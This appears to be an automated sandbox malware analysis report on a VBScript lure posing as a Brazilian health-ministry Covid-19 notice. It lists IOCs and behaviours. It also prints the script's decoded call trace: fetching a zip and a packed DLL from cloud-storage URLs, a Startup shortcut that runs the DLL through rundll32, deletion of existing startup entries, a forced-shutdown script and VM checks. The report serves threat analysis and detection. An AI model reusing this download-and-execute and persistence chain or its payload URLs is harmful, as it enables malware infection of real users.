Analysis Report Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs

ID:	351167
Product:	CloudBasic
Start time:	11:45:40
Start date:	10.02.2021
Sample:	Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	bef99a24632c89aa1676f0c5e5bfb11b
SHA1:	335c3b6151df7e3e31b603bd55d24c0de56a8d5a
SHA256:	64f6d8c5d529aa3ab6626a3b9be57c4b9e0c2130ec3358c12d53e3453a83a76c
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	73613FF2907A65372D31B63F54F0C8C0	6D1E1D74EA1577C0DC122A9BDF03B1D0CDC4D098	03EA4C3751E266606857BA8AF7A345D3863B5CC097A8BC2FB02567A24C4BF9A7
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\0[1].zip	Zip archive data, at least v2.0 to extract	F6F9C197DE97000E33113089993889A8	9EF214E6077BAF24057AE37DC971C4D80DB983C4	88643A7FC5653791841207C713EA290A1D0A0264B37A7D3B031815E52211BB09
C:\Users\user\AppData\Roaming\0.zip	Zip archive data, at least v2.0 to extract	F6F9C197DE97000E33113089993889A8	9EF214E6077BAF24057AE37DC971C4D80DB983C4	88643A7FC5653791841207C713EA290A1D0A0264B37A7D3B031815E52211BB09
C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	2337870D92D47375B4E9C6E94FD56098	7F49AB1AFC4262961E0F369061D982193614A599	5BDA50B89E18DE37C6BF7E4B6D6F723D32E92BC9A3248351386C2A1694824AD1
C:\Users\user\AppData\Roaming\jbnusslocvu.vbs	ASCII text, with CRLF line terminators	FFD5B69483FACBB5C2A9E4E57100AA2B	1388A7CB1D74670CD34A565DD6FE0803C5AF6D94	361932AA4CAEA0CEE67D0810EEB8A2EDACE52E2219DCAD6E43E8EF64266C0D53

AV Detection:

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll

Avira: detection malicious, Label: HEUR/AGEN.1118892

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs	Virustotal: Detection: 30%			Perma Link
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs	ReversingLabs: Detection: 17%

Networking:

Potential malicious VBS script found (has network functionality)

Source:	Initial file: .write UWZGHTNQST.responseBody
Source:	Initial file: .savetofile FVWUJVVSEL, 2
Source:	Initial file: .write IQSDEMNRXA.responseBody
Source:	Initial file: .savetofile DHONGHAMSC, 2

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 8.8.8.8 8.8.8.8
Source: Joe Sandbox View	IP Address: 8.8.8.8 8.8.8.8

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: GOOGLEUS GOOGLEUS

Urls found in memory or binary data

Source: wscript.exe	String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip
Source: wscript.exe	String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-2-19.dll

System Summary:

Detected VMProtect packer

Source: P-2-19[1].dll.0.dr

Static PE information: .vmp0 and .vmp1 section names

Abnormal high CPU Usage

Source: C:\Windows\System32\wscript.exe

Process Stats: CPU usage > 98%

Java / VBScript file with very long strings (likely obfuscated code)

Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs

Initial sample: Strings found which are bigger than 50

PE file contains more sections than normal

Source: P-2-19[1].dll.0.dr

Static PE information: Number of sections : 13 > 10

Classification label

Source: classification engine

Classification label: mal100.evad.winVBS@1/5@0/2

Creates files inside the user directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\jbnusslocvu.vbs

Jump to behavior

Executes visual basic scripts

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs'

Reads ini files

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs	Virustotal: Detection: 30%
Source: Comuinicado-Covid19-Min-Saude-VRC-03-02-21-210.vbs	ReversingLabs: Detection: 17%

Uses an in-process (OLE) Automation server

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\jbnusslocvu.vbs", "true");ITextStream.Write("Set MTTDJRICBE = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\38695955395697");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-2-19.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll J7xmDcvOVJMXsSwGkQO");IWshShortcut.WindowStyle("1");IWshShortcut.WorkingDirectory("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt");IWshShortcut.Save();IFileSystem3.OpenTextFile("C:\Users\user\AppData\Roaming\jbnusslocvu.vbs");ITextStream.ReadAll();ITextStream.Close();IHost.Sleep("300000");ISWbemServicesEx.ExecQuery("select * from Win32_OperatingSystem where Primary=true");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01000001("6")

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp1

PE file contains sections with non-standard names

Source: P-2-19[1].dll.0.dr	Static PE information: section name: .didata
Source: P-2-19[1].dll.0.dr	Static PE information: section name: .vmp0
Source: P-2-19[1].dll.0.dr	Static PE information: section name: .vmp1

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\jbnusslocvu.vbs

Jump to behavior

Drops PE files

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll			Jump to dropped file

Boot Survival:

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnk

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vffqkikpdt .lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\wscript.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Disables application error messsages (SetErrorMode)

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion:

Potential evasive VBS script found (sleep loop)

Source: Initial file	Initial file: GZTGQBVSUV.Write "WScript.Sleep(300000)" & vbCrLf
Source: C:\Windows\System32\wscript.exe	Dropped file: WScript.Sleep(300000)			Jump to dropped file

Contains capabilities to detect virtual machines

Source: C:\Windows\System32\wscript.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\P-2-19[1].dll			Jump to dropped file
Source: C:\Windows\System32\wscript.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\38695955395697\krdxnsceqxwvyknup17065344631671.dll			Jump to dropped file

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files

Source: C:\Windows\System32\wscript.exe

File created: P-2-19[1].dll.0.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 172.217.168.48 187

Jump to behavior

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior